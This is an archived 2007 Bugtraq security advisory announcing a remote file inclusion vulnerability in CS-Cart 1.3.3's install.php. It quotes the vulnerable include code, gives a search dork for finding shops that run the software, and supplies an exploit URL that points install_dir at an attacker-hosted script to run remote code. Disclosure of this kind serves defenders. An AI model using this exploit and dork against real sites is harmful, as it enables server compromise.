CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
From: ahmed_labib_hilmy@xxxxxxxxx
Date: 9 Jan 2007 23:33:50 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
$$ Script site: http://www.cs-cart.com
$$ Dork: Powered by CS-Cart - Shopping Cart Software
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Found: irvian
$$
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$Greetz:ibnusina and all
$$ Specjal greetz:#hitamputih 
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

$install_dir = dirname(__FILE__);
$install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' 
: 'skins';
include $install_dir.'/core/install.php'

Expl:
http://www.site.com/[CS-Cart_path]/install.php?install_dir=[evil_scripts]

Prev by Date: Re: slocate leaks filenames of protected directories
Next by Date: Re: a cheesy Apache / IIS DoS vuln (+a question)
Previous by thread: [ GLSA 200701-04 ] SeaMonkey: Multiple vulnerabilities
Next by thread: A Major design Bug in Steganography 1.7.x, 1.8 (latest) (Updated Version)
Index(es):
- Date
- Thread